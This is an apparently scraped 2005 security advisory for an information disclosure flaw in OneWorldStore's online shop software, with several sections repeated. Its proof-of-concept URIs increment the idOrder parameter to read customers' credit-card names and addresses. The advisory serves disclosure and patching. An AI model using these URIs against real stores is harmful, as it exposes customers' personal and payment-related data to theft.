OneWorldStore IDOrder Information Disclosure Vulnerability
BID:13361
Info
OneWorldStore IDOrder Information Disclosure Vulnerability
| Bugtraq ID: | 13361 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 25 2005 12:00AM |
| Updated: | Apr 25 2005 12:00AM |
| Credit: | Lostmon <[email protected]> is credited with the discovery of this vulnerability. |
| Vulnerable: |
OneWorldStore OneWorldStore |
| Not Vulnerable: | |
Discussion
OneWorldStore IDOrder Information Disclosure Vulnerability
OneWorldStore is prone to an information disclosure vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
Exploitation of this vulnerability would expose the customer names, as they appear on credit cards, and their addresses to the attacker.
OneWorldStore is prone to an information disclosure vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
Exploitation of this vulnerability would expose the customer names, as they appear on credit cards, and their addresses to the attacker.
Exploit / POC
OneWorldStore IDOrder Information Disclosure Vulnerability
No exploit is required.
The following proof of concept URIs are available:
http://www.example.com/owBasket/PaymentMethods/owOfflineCC.asp?idOrder=1
http://www.example.com/owBasket/PaymentMethods/owOfflineCC.asp?idOrder=2
http://www.example.com/owBasket/PaymentMethods/owOfflineCC.asp?idOrder=3
http://www.example.com/owBasket/PaymentMethods/owOfflineCC.asp?idOrder=
No exploit is required.
The following proof of concept URIs are available:
http://www.example.com/owBasket/PaymentMethods/owOfflineCC.asp?idOrder=1
http://www.example.com/owBasket/PaymentMethods/owOfflineCC.asp?idOrder=2
http://www.example.com/owBasket/PaymentMethods/owOfflineCC.asp?idOrder=3
http://www.example.com/owBasket/PaymentMethods/owOfflineCC.asp?idOrder=
Solution / Fix
OneWorldStore IDOrder Information Disclosure Vulnerability
Solution:
The vendor has addressed this issue in the latest update.
OneWorldStore OneWorldStore
Solution:
The vendor has addressed this issue in the latest update.
OneWorldStore OneWorldStore
-
OneWorldStore OneWorldStore Current
http://oneworldstore.com/support_updates.asp
References
OneWorldStore IDOrder Information Disclosure Vulnerability
References:
References:
- Lostmon's Blog Page (Lostmon ([email protected]))
- OneWorldStore Homepage (OneWorldStore)
- OneWorldStore Security Advisories (OneWorldStore)